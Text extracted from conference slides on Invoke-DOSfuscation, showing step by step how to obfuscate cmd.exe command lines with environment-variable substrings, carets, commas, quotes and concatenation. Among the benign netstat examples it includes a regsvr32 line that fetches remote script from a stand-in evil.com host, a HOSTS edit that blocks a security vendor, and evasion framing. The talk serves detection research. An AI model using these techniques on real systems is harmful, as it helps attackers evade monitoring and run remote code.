![Page 55: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/55.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
55
Deep(er) Dive: Advanced Payload Obfuscation
cmd.exe setup portion rest of the command
![Page 56: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/56.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• %COMSPEC% :: env var for "C:\Windows\system32\cmd.exe"
• /b :: exits cmd.exe to calling program with specified process exit code
• /c :: remainder of command line processed as a command
• start :: execute remaining command without waiting for it to finish
• /b :: (same as before but for second command)
• /min :: start window minimized
56
Deep(er) Dive: Advanced Payload Obfuscation
![Page 57: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/57.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
57
Deep(er) Dive: Advanced Payload Obfuscation
![Page 58: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/58.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
58
Deep(er) Dive: Advanced Payload Obfuscation
27 chars
![Page 59: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/59.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
59
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
Deep(er) Dive: Advanced Payload Obfuscation
27 chars
![Page 60: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/60.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
60
• %COMSPEC:~0,1337%
• %COMSPEC:~-1337%
• %COMSPEC:~-1337,1337%
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
27 chars
Deep(er) Dive: Advanced Payload Obfuscation
![Page 61: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/61.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
61
• %COMSPEC:\=/%
• %COMSPEC:KeepMatt=Happy%
• %COMSPEC:*System32\=%
• %COMSPEC:*Tea=Coffee%
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
• %COMSPEC:~0,1337%
• %COMSPEC:~-1337%
• %COMSPEC:~-1337,1337%
Deep(er) Dive: Advanced Payload Obfuscation
![Page 62: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/62.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %COMSPEC:~0,27%
• Env var substitution
• %COMSPEC:\=/%
62
• %COMSPEC:\=/%
• %COMSPEC:KeepMatt=Happy%
• %COMSPEC:*System32\=%
• %COMSPEC:*Tea=Coffee%
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
• %COMSPEC:~0,1337%
• %COMSPEC:~-1337%
• %COMSPEC:~-1337,1337%
Deep(er) Dive: Advanced Payload Obfuscation
![Page 63: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/63.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %coMSPec:~0,27%
• Env var substitution
• %coMSPec:\=/%
63
• Random Case
Deep(er) Dive: Advanced Payload Obfuscation
![Page 64: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/64.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %coMSPec:~ 0, 27%
• Env var substitution
• %coMSPec: \ = / %
64
• Random Case
• Whitespace
Deep(er) Dive: Advanced Payload Obfuscation
![Page 65: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/65.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %coMSPec:~ -0, +27%
• Env var substitution
• %coMSPec: \ = / %
65
• Random Case
• Whitespace
• Explicit signing
Deep(er) Dive: Advanced Payload Obfuscation
![Page 66: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/66.jpg)
• %coMSPec: \ = / % /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %coMSPec:~ -0, +27%
• Env var substitution
• %coMSPec: \ = / %
66
Deep(er) Dive: Advanced Payload Obfuscation
![Page 67: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/67.jpg)
• %coMSPec: \ = / % /b /c start /b /min netstat -ano | findstr LISTENING
67
• Context is crucial
• ✔ Cmd.exe
• ✔WScript.Shell
• ✘ Service
• ✘ Run key
• ✘ Scheduled task
Deep(er) Dive: Advanced Payload Obfuscation
![Page 68: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/68.jpg)
• %coMSPec: \ = / % /B /c sTArt /b /mIN neTSTat -aNo | fiNDstr LISTENING
68
• Random case
Deep(er) Dive: Advanced Payload Obfuscation
![Page 69: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/69.jpg)
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING
69
C:\Windows\system32\cmd.exe /B/csTArt/b/mIN neTSTat -aNo
NOTE: Single whitespace is added
to process arguments.
• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
![Page 70: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/70.jpg)
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING
70
Netstat's -ano arg reordering• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
![Page 71: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/71.jpg)
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -Noa|fiNDstr LISTENING
71
Netstat's -ano arg reordering• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
![Page 72: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/72.jpg)
• %coMSPec: \ = / % /B /c sTArt /b /mIN neTSTat -Noa | fiNDstr
LISTENING
72
• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
![Page 73: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/73.jpg)
• ,;,%coMSPec: \ = / %,;,/B,;,/c,;,sTArt,;,/b ,;/mIN ,;neTSTat -Noa |,;,fiNDstr
LISTENING
73
• Random case
• Whitespace (-/+)
• Comma & semicolon
Deep(er) Dive: Advanced Payload Obfuscation
![Page 74: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/74.jpg)
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b
^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr
LIST^^^ENING
74
Let's look at process
execution layers &
respective arguments!
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
Deep(er) Dive: Advanced Payload Obfuscation
![Page 75: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/75.jpg)
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b
^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr
LIST^^^ENING
75
C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^STat ^^ ^^-N^^oa ^^
|,;,fi^NDstr LIST^ENING
C:\Windows\system32\cmd.exe /S /D /c"
sTArt,;,/^b ^ ,;/^mIN^ ,;neT^STat ^ ^-N^oa ^ "
neTSTat -Noa
fiNDstr LISTENING
Deep(er) Dive: Advanced Payload Obfuscation
![Page 76: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/76.jpg)
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b
^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr
LIST^^^ENING
76
C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^STat ^^ ^^-N^^oa ^^
|,;,fi^NDstr LIST^ENING
C:\Windows\system32\cmd.exe /S /D /c"
sTArt,;,/^b ^ ,;/^mIN^ ,;neT^STat ^ ^-N^oa ^ "
neTSTat -Noa
fiNDstr LISTENING
, ; and ^ do NOT persist into final
netstat & findstr commands. Is there
another obfuscation character?
Deep(er) Dive: Advanced Payload Obfuscation
![Page 77: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/77.jpg)
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b
^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^ST""at ^^^^ ^^^^-N^^^^o""a ^^^^ ^|,;,fi^^^ND""str
LIST^^^EN""ING
77
C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^ST""at ^^ ^^-N^^o""a
^^ |,;,fi^ND""str LIST^EN""ING
C:\Windows\system32\cmd.exe /S /D /c"
sTArt,;,/^b ^ ,;/^mIN^ ,;neT^ST""at ^ ^-N^o""a ^ "
neTST""at -No""a
fiND""str LISTEN""ING
YES! Double quotes are widely-
accepted obfuscation characters.
(, ; and ^ are binary-specific)
Deep(er) Dive: Advanced Payload Obfuscation
![Page 78: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/78.jpg)
• Invoke-DOSfuscation supports and randomizes all of these obfuscation components
• For obfuscating final cmdline arguments:
• User-input command (e.g. netstat -ano)
must be obfuscated manually (, ; ^ "" etc.)
• Invoke-DOSfuscation handles all layers
of escaping for input obfuscation characters
78
INSANELY complicated in certain
scenarios, especially since there is
no tokenizer for cmd.exe like there
is for PowerShell.
Deep(er) Dive: Advanced Payload Obfuscation
![Page 79: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/79.jpg)
• Invoke-DOSfuscation supports and randomizes all of these obfuscation components
• For obfuscating final cmdline arguments:
• User-input command (e.g. netstat -ano)
must be obfuscated manually (, ; ^ "" etc.)
• Invoke-DOSfuscation handles all layers
of escaping for input obfuscation characters
79
INSANELY complicated in certain
scenarios, especially since there is
no tokenizer for cmd.exe like there
is for PowerShell.http://www.reactiongifs.com/r/small-violin.gif
Deep(er) Dive: Advanced Payload Obfuscation
![Page 80: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/80.jpg)
• What cmd.exe commands do attackers use that do NOT create child processes?
80
Deep(er) Dive: Advanced Payload Obfuscation
![Page 81: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/81.jpg)
• What cmd.exe commands do attackers use that do NOT create child processes?
• File copy: cmd /c copy powershell.exe benign.exe
• File deletion: cmd /c del benign.exe
• File creation: cmd /c "echo LINE1 > bad.vbs&&echo LINE2 >> bad.vbs"
• File read: cmd /c type HOSTS
• File modification: cmd /c "echo 127.0.0.1 cloud.security-vendor.com >> HOSTS"
• File listing: cmd /c dir "C:\Program Files\*"
• Dir creation: cmd /c mkdir %PUBLIC%\Recon
• Symbolic link creation: cmd /c mklink ClickMe C:\Users\Public\evil.exe
81
Deep(er) Dive: Advanced Payload Obfuscation
![Page 82: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/82.jpg)
• Perhaps your target is monitoring for carets, commas, semicolons, etc.
• What additional obfuscation options does cmd.exe give us?
1.
2.
3.
4.
82
Deep(er) Dive: Advanced Payload Obfuscation
![Page 83: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/83.jpg)
• cmd /c netstat -ano
83
Payload Obfuscation 1 of 4: Concatenation
![Page 84: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/84.jpg)
• cmd /c netstat -ano
84
– and / interchangeability
Payload Obfuscation 1 of 4: Concatenation
![Page 85: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/85.jpg)
• cmd /c netstat /ano
85
– and / interchangeability
Payload Obfuscation 1 of 4: Concatenation
![Page 86: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/86.jpg)
• cmd /c netstat /ano
86
– and / interchangeability
• More examples:
• wscript.exe /nologo …
• powershell.exe -nop -noni -enc …
• regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
![Page 87: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/87.jpg)
• cmd /c netstat /ano
87
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe -nop -noni -enc …
• regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
![Page 88: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/88.jpg)
• cmd /c netstat /ano
88
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
![Page 89: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/89.jpg)
• cmd /c netstat /ano
89
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe -s -n -u -i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
![Page 90: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/90.jpg)
• cmd /c netstat /ano
90
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe -s -n -u -i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
![Page 91: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/91.jpg)
• cmd /c netstat /ano
91
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe -s -n -u -i:https:\\evil.com\a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
![Page 92: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/92.jpg)
• cmd /c netstat /ano
92
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe -s -n -u -i:https:\\evil.com\a scrobj.dll
https://i.imgur.com/8oXBdLG.gif
Payload Obfuscation 1 of 4: Concatenation
![Page 93: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/93.jpg)
• cmd /c "set com=netstat /ano&&echo %com%"
93
Payload Obfuscation 1 of 4: Concatenation
![Page 94: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/94.jpg)
• cmd /c "set com=netstat /ano&&echo %com%"
94
Payload Obfuscation 1 of 4: Concatenation
![Page 95: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/95.jpg)
• cmd /c "set com=netstat /ano&&call %com%"
95
Payload Obfuscation 1 of 4: Concatenation
![Page 96: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/96.jpg)
• cmd /c "set com=netstat /ano&&call %com%"
96
Payload Obfuscation 1 of 4: Concatenation
![Page 97: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/97.jpg)
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call
%com1%%com2%%com3%"
97
Payload Obfuscation 1 of 4: Concatenation
![Page 98: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/98.jpg)
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call
%com1%%com2%%com3%"
98
#TestYourTools:
• Sysmon EID 1 CommandLine adds duplicate %'s
• EventVwr.exe
• PowerShell's Get-WinEvent
Payload Obfuscation 1 of 4: Concatenation
http://www.danielbohannon.com/blog-1/2018/3/19/test-your-dfir-tools-sysmon-edition
DETOUR
![Page 99: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/99.jpg)
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call
%com1%%com2%%com3%"
99
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
![Page 100: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/100.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call
%com1%%com2%%com3%"
100
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
![Page 101: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/101.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
101
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
![Page 102: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/102.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
102
1.
2.
3.
4.
5.
1.
2.
3.
4.
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
![Page 103: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/103.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
103
1. call %final%
2.
3.
4.
5.
1. (default when possible)
2.
3.
4.
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
![Page 104: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/104.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
104
1. call %final%
2. cmd /c %final%
3.
4.
5.
1. (default when possible)
2. -FinalBinary cmd
3.
4.
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
![Page 105: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/105.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
105
1. call %final%
2. cmd /c %final%
3. call echo %final% | cmd
4.
5.
1. (default when possible)
2. -FinalBinary cmd
3. -FinalBinary cmd -StdIn
4.
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
![Page 106: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/106.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
106
1. call %final%
2. cmd /c %final%
3. call echo %final% | cmd
4. call powershell "%final%"
5.
1. (default when possible)
2. -FinalBinary cmd
3. -FinalBinary cmd -StdIn
4. -FinalBinary PowerShell
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
